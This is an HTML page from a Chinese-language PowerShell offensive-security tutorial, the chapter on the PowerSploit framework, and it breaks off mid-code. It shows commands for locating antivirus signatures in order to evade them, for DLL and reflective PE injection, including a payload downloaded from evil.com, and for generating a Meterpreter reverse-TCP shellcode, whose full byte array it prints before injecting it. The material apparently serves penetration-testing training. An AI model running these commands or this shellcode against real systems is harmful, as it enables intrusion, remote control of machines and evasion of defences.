
<!DOCTYPE HTML>
<html lang="" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>Framework · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="gitbook/images/favicon.ico" type="image/x-icon">

    
    
    <link rel="prev" href="12. 实例使用场景.html" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="./">
            
                <a href="./">
            
                    
                    前言
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="kerberos/README.md">
            
                <span>
            
                    
                    基础篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.2.1" data-path="2. 基础.html">
            
                <a href="2. 基础.html">
            
                    
                    基础知识
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.2" data-path="3. 脚本编写与执行.html">
            
                <a href="3. 脚本编写与执行.html">
            
                    
                    脚本编写与执行
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.3" data-path="4. Scoket网络编程.html">
            
                <a href="4. Scoket网络编程.html">
            
                    
                    Scoket网络编程
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.4" data-path="5. 端口扫描与服务爆破.html">
            
                <a href="5. 端口扫描与服务爆破.html">
            
                    
                    端口扫描与服务爆破
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.5" data-path="6. 多线程.html">
            
                <a href="6. 多线程.html">
            
                    
                    多线程
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.3" data-path="ntlm-pian/README.md">
            
                <span>
            
                    
                    进阶篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.3.1" data-path="7. WMI对象操作.html">
            
                <a href="7. WMI对象操作.html">
            
                    
                    WMI&dot-net对象操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.2" data-path="8. Win32API.html">
            
                <a href="8. Win32API.html">
            
                    
                    Win32API
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.3" data-path="9. Dll注入&shellcode注入&exe注入.html">
            
                <a href="9. Dll注入&shellcode注入&exe注入.html">
            
                    
                    注入操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.4" data-path="10. 混淆.html">
            
                <a href="10. 混淆.html">
            
                    
                    混淆
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.5" data-path="11. 日志操作.html">
            
                <a href="11. 日志操作.html">
            
                    
                    日志操作
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.4" data-path="ldap-pian/README.md">
            
                <span>
            
                    
                    应用篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.4.1" data-path="12. 实例使用场景.html">
            
                <a href="12. 实例使用场景.html">
            
                    
                    实例使用场景
            
                </a>
            

            
        </li>
    
        <li class="chapter active" data-level="1.4.2" data-path="13. Framework.html">
            
                <a href="13. Framework.html">
            
                    
                    Framework
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="." >Framework</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="powershell13-framework">Powershell(13)-Framework</h1>
<p>&#x6211;&#x4EEC;&#x5BF9;&#x4E8E;&#x6846;&#x67B6;&#x7684;&#x4ECB;&#x7ECD;&#x4E3B;&#x8981;&#x4ECB;&#x7ECD;<a href="https://github.com/PowerShellMafia/PowerSploit" target="_blank">Powersploit</a>&#x4E0E;<a href="https://github.com/samratashok/nishang" target="_blank">Nishang</a>&#xFF0C;&#x672C;&#x6765;&#x5199;&#x4E86;<a href="https://www.powershellempire.com/" target="_blank">Empire</a>&#x7684;&#xFF0C;&#x53EF;&#x662F;&#x5728;&#x53D1;&#x5E03;&#x6587;&#x7AE0;&#x4E4B;&#x524D;&#x4E0D;&#x4E45;&#x521A;&#x53D1;&#x4E86;&#x7C7B;&#x4F3C;&#x7684;&#x6587;&#x7AE0;&#xFF0C;&#x6240;&#x4EE5;&#x5220;&#x53BB;&#x90E8;&#x5206;&#x5185;&#x5BB9;&#xFF0C;&#x5982;&#x679C;&#x9700;&#x8981;&#x5B66;&#x4E60;Empire&#x7684;&#x670B;&#x53CB;&#xFF0C;&#x53EF;&#x4EE5;&#x53BB;&#x5B89;&#x5168;&#x5BA2;&#x641C;&#x7D22;&#x6587;&#x7AE0;&#xFF0C;&#x5F53;&#x7136;&#x8FD8;&#x662F;&#x63A8;&#x8350;&#x67E5;&#x770B;Empire&#x7684;&#x624B;&#x518C;&#x3002;&#x4E0B;&#x9762;&#x5F00;&#x59CB;&#x4ECB;&#x7ECD;&#x4E24;&#x4E2A;&#x6846;&#x67B6;&#xFF1A;</p>
<p>&#x6CE8;&#xFF1A;&#x672C;&#x7BC7;&#x7BC7;&#x5E45;&#x53EF;&#x80FD;&#x8FC7;&#x957F;&#xFF0C;&#x6587;&#x5B57;&#x8F83;&#x591A;&#xFF0C;&#x53EF;&#x4EE5;&#x5728;&#x9700;&#x8981;&#x7684;&#x65F6;&#x5019;&#x76F4;&#x63A5;&#x6253;&#x5F00;&#x6587;&#x7AE0;&#x641C;&#x7D22;&#x5373;&#x53EF;&#x3002;</p>
<h2 id="powersploit">PowerSploit</h2>
<h3 id="antivirusbypass">AntivirusBypass</h3>
<h4 id="find-avsignature">Find-AVSignature</h4>
<p>&#x5BFB;&#x627E;&#x53CD;&#x75C5;&#x6BD2;&#x8F6F;&#x4EF6;&#x7279;&#x5F81;&#x7801;&#xFF0C;&#x601D;&#x8DEF;&#x7C7B;&#x4F3C;&#x4E8E;&#x4E8C;&#x5206;&#x6CD5;</p>
<p><strong>&#x53C2;&#x8003;</strong></p>
<blockquote>
<p> <a href="http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html" target="_blank">http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html</a></p>
</blockquote>
<p><strong>&#x793A;&#x4F8B;</strong>
&#x5047;&#x8BBE;&#x6211;&#x4EEC;&#x7684;&#x8FDC;&#x63A7;&#x6587;&#x4EF6;&#x504F;&#x79FB;&#x8303;&#x56F4;&#x4E3A;0~10000</p>
<pre><code class="lang-powershell">Find-AVSignature -StartByte <span class="hljs-number">0</span> -EndByte <span class="hljs-number">10000</span> -Interval <span class="hljs-number">5000</span> -Path test.exe
</code></pre>
<p>&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x5C06;&#x4F1A;&#x628A;test.exe&#x4EE5;5000&#x5B57;&#x8282;&#x4F5C;&#x4E3A;&#x5757;&#x5927;&#x5C0F;&#xFF0C;&#x5206;&#x4E3A;&#x4E24;&#x4E2A;&#x6709;&#x6548;&#x90E8;&#x5206;&#x3002;&#x7B2C;&#x4E00;&#x4E2A;&#x90E8;&#x5206;&#x504F;&#x79FB;&#x8303;&#x56F4;&#x662F;0~5000&#xFF0C;&#x7B2C;&#x4E8C;&#x90E8;&#x5206;&#x504F;&#x79FB;&#x4E3A;0~9999&#x3002;&#x4E4B;&#x540E;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5206;&#x522B;&#x4F7F;&#x7528;&#x6740;&#x8F6F;&#x626B;&#x63CF;&#x8FD9;&#x4E24;&#x4E2A;&#x6587;&#x4EF6;&#x3002;&#x4E0D;&#x59A8;&#x8BBE;&#x7B2C;&#x4E00;&#x4E2A;&#x6587;&#x4EF6;&#x6CA1;&#x6709;&#x62A5;&#x6BD2;&#xFF0C;&#x800C;&#x7B2C;&#x4E8C;&#x4E2A;&#x6587;&#x4EF6;&#x62A5;&#x6BD2;&#x4E86;&#xFF0C;&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5C31;&#x77E5;&#x9053;&#xFF0C;&#x7279;&#x5F81;&#x7801;&#x5E94;&#x8BE5;&#x5B58;&#x5728;&#x4E8E;&#x504F;&#x79FB;&#x8303;&#x56F4;5001~9999&#x5B57;&#x8282;&#x5185;&#x3002;</p>
<p>&#x63A5;&#x4E0B;&#x6765;&#x6211;&#x4EEC;&#x91CD;&#x590D;&#x540C;&#x6837;&#x7684;&#x6B65;&#x9AA4;&#xFF1A;</p>
<pre><code>Find-AVSignature -StartByte 5001 -EndByte 10000 -Interval 2500 -Path test.exe
</code></pre><p>&#x518D;&#x5C06;&#x5F97;&#x5230;&#x7684;&#x6587;&#x4EF6;&#x8FDB;&#x884C;&#x626B;&#x63CF;&#xFF0C;&#x5982;&#x6B64;&#x5F80;&#x590D;&#xFF0C;&#x76F4;&#x5230;&#x5B9A;&#x4F4D;&#x51FA;&#x7279;&#x5F81;&#x7801;&#x3002;</p>
<h3 id="codeexecution">CodeExecution</h3>
<h4 id="invoke-dllinjection">Invoke-DLLInjection</h4>
<p>DLL&#x6CE8;&#x5165;&#x811A;&#x672C;
&#x6CE8;&#x610F;dll&#x67B6;&#x6784;&#x8981;&#x4E0E;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x76F8;&#x7B26;&#xFF0C;&#x540C;&#x65F6;&#x8981;&#x5177;&#x5907;&#x76F8;&#x5E94;&#x7684;&#x6743;&#x9650;</p>
<p><strong>&#x793A;&#x4F8B;</strong></p>
<pre><code class="lang-powershell">Invoke-DLLInjection -ProcessID <span class="hljs-number">1612</span> -dll test.dll
</code></pre>
<h4 id="invoke-reflectivepeinjection">Invoke-ReflectivePEInjection</h4>
<p>&#x53CD;&#x5C04;&#x578B;&#x6CE8;&#x5165;&#xFF0C;bypass AV&#x7684;&#x4E00;&#x628A;&#x5229;&#x5668;
&#x4E2A;&#x4EBA;&#x8BA4;&#x4E3A;&#x53CD;&#x5C04;&#x578B;dll&#x6CE8;&#x5165;&#x7684;&#x7CBE;&#x9AD3;&#x4E4B;&#x4E00;&#x5C31;&#x5728;&#x4E8E;&#x80FD;&#x505A;&#x5230;&#x4E0D;&#x5728;&#x76EE;&#x6807;&#x78C1;&#x76D8;&#x4E0A;&#x7559;&#x4E0B;&#x6587;&#x4EF6;&#xFF0C;&#x800C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x7684;&#x4E00;&#x5927;&#x7F3A;&#x9677;&#x4FBF;&#x662F;&#x4E0D;&#x80FD;&#x8FDC;&#x7A0B;&#x52A0;&#x8F7D;dll/exe&#xFF0C;&#x56E0;&#x6B64;&#x8981;&#x505A;&#x5230;&#x65E0;&#x6587;&#x4EF6;&#x5C31;&#x7A0D;&#x663E;&#x9EBB;&#x70E6;&#x3002; &#x597D;&#x5728;&#x5DF2;&#x7ECF;&#x6709;&#x4EBA;&#x5199;&#x51FA;&#x4E86;&#x53EF;&#x4EE5;&#x4ECE;&#x670D;&#x52A1;&#x5668;&#x4E0B;&#x8F7D;&#x6587;&#x4EF6;&#x5E76;&#x6CE8;&#x5165;&#x7684;<a href="https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1" target="_blank">&#x811A;&#x672C;</a>&#x3002;</p>
<p>&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF0C;ForceASLR&#x9009;&#x9879;&#x5E76;&#x4E0D;&#x9002;&#x7528;&#x4E8E;&#x6240;&#x6709;dll/exe,
&#x67B6;&#x6784;&#x4E0A;&#x4E5F;&#x5C3D;&#x91CF;&#x505A;&#x5230;&#x76F8;&#x540C;&#x3002;</p>
<p><strong>&#x4E0B;&#x9762;&#x5747;&#x4EE5;&#x52A0;&#x5F3A;&#x7248;&#x4F5C;&#x793A;&#x4F8B;</strong>&#x3002;</p>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x4E0B;&#x8F7D;dll&#x5E76;&#x6CE8;&#x5165;&#x5230;id&#x4E3A;1320&#x7684;&#x8FDB;&#x7A0B;&#x4E2D;</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEUrl http://evil.com/test.dll -ProcId <span class="hljs-number">1320</span>
</code></pre>
<p><strong>&#x5F3A;&#x5236;&#x4F7F;&#x7528;ASLR</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEUrl http://evil.com/test.dll -ProcId <span class="hljs-number">1320</span> -ForceASLR
</code></pre>
<p><strong>&#x4ECE;&#x672C;&#x5730;&#x52A0;&#x8F7D;dll&#x5E76;&#x6CE8;&#x5165;&#x6307;&#x5B9A;&#x8FDB;&#x7A0B;</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEPath test.dll
-ProcId <span class="hljs-number">1320</span>
</code></pre>
<p><strong>&#x5411;exe&#x4F20;&#x53C2;</strong></p>
<pre><code class="lang-powershell">Invoke-ReflectivePEInjection -PEPath test.dll
-ProcId <span class="hljs-number">1320</span> -ExeArgs <span class="hljs-string">&quot;arg1 arg2&quot;</span>
</code></pre>
<h4 id="invoke-shellcode">Invoke-Shellcode</h4>
<p>&#x5411;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;shellcode
&#x4F9D;&#x7136;&#x9700;&#x8981;&#x6CE8;&#x610F;shellcode&#x67B6;&#x6784;&#x7684;&#x95EE;&#x9898;</p>
<p><strong>&#x793A;&#x4F8B;</strong>
<strong>&#x5411;powershell&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;meterpreter</strong></p>
<p><strong>&#x751F;&#x6210;shellcode</strong></p>
<pre><code class="lang-powershell">msfvenom -p windows/meterpreter/reverse_tcp lhost=<span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span> lport=<span class="hljs-number">4444</span> -f powershell

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: <span class="hljs-number">333</span> bytes
Final size of powershell file: <span class="hljs-number">1625</span> bytes
[Byte[]] <span class="hljs-variable">$buf</span> = <span class="hljs-number">0</span>xfc,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x82,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x60,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x64,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x14,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x72,<span class="hljs-number">0</span>x28,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xb7,<span class="hljs-number">0</span>x4a,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xac,<span class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x7c,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x2c,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xe2,<span class="hljs-number">0</span>xf2,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4a,<span class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x78,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x48,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd1,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x18,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x3a,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x34,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd6,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xac,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>x38,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xf6,<span class="hljs-number">0</span>x3,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x3b,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xe4,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x66,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x4b,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x1c,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd0,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>x44,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x5b,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x5a,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x12,<span class="hljs-number">0</span>xeb,<span class="hljs-number">0</span>x8d,<span class="hljs-number">0</span>x5d,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x33,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x73,<span class="hljs-number">0</span>x32,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x77,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x7,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>xb8,<span class="hljs-number">0</span>x90,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc4,<span class="hljs-number">0</span>x54,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>x80,<span class="hljs-number">0</span>x6b,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x5,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>xa8,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x5c,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe6,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xea,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xdf,<span class="hljs-number">0</span>xe0,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x97,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x99,<span class="hljs-number">0</span>xa5,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x85,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x74,<span class="hljs-number">0</span>xa,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x4e,<span class="hljs-number">0</span>x8,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xec,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x4,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7e,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x36,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>xa4,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x93,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>xd9,<span class="hljs-number">0</span>xc8,<span class="hljs-number">0</span>x5f,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x83,<span class="hljs-number">0</span>xf8,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x7d,<span class="hljs-number">0</span>x22,<span class="hljs-number">0</span>x58,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x40,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>xb,<span class="hljs-number">0</span>x2f,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x68,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>x6e,<span class="hljs-number">0</span>x4d,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>x5e,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x24,<span class="hljs-number">0</span>xe9,<span class="hljs-number">0</span>x71,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>x29,<span class="hljs-number">0</span>xc6,<span class="hljs-number">0</span>x75,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xc3,<span class="hljs-number">0</span>xbb,<span class="hljs-number">0</span>xf0,<span class="hljs-number">0</span>xb5,<span class="hljs-number">0</span>xa2,<span class="hljs-number">0</span>x56,<span class="hljs-number">0</span>x6a,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x53,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xd5
</code></pre>
<p><strong>&#x6CE8;&#x5165;shellcode</strong></p>
<pre><code class="lang-powershell">Invoke-Shellcode -Shellcode @(<span class="hljs-number">0</span>xfc,<span class="hljs-number">0</span>xe8,<span class="hljs-number">0</span>x82,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x0,<span class="hljs-number">0</span>x60,<span class="hljs-number">0</span>x89,<span class="hljs-number">0</span>xe5,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xc0,<span class="hljs-number">0</span>x64,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x50,<span class="hljs-number">0</span>x30,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>xc,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x14,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x72,<span class="hljs-number">0</span>x28,<span class="hljs-number">0</span>xf,<span class="hljs-number">0</span>xb7,<span class="hljs-number">0</span>x4a,<span class="hljs-number">0</span>x26,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span class="hljs-number">0</span>xac,<span class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x61,<span class="hljs-number">0</span>x7c,<span class="hljs-number">0</span>x2,<span class="hljs-number">0</span>x2c,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>xc1,<span class="hljs-number">0</span>xcf,<span class="hljs-number">0</span>xd,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xc7,<span class="hljs-number">0</span>xe2,<span class="hljs-number">0</span>xf2,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x57,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x52,<span class="hljs-number">0</span>x10,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4a,<span class="hljs-number">0</span>x3c,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x4c,<span class="hljs-number">0</span>x11,<span class="hljs-number">0</span>x78,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x48,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd1,<span class="hljs-number">0</span>x51,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x59,<span class="hljs-number">0</span>x20,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd3,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x18,<span class="hljs-number">0</span>xe3,<span class="hljs-number">0</span>x3a,<span class="hljs-number">0</span>x49,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x34,<span class="hljs-number">0</span>x8b,<span class="hljs-number">0</span>x1,<span class="hljs-number">0</span>xd6,<span class="hljs-number">0</span>x31,<span class="hljs-number">0</span>xff,<span 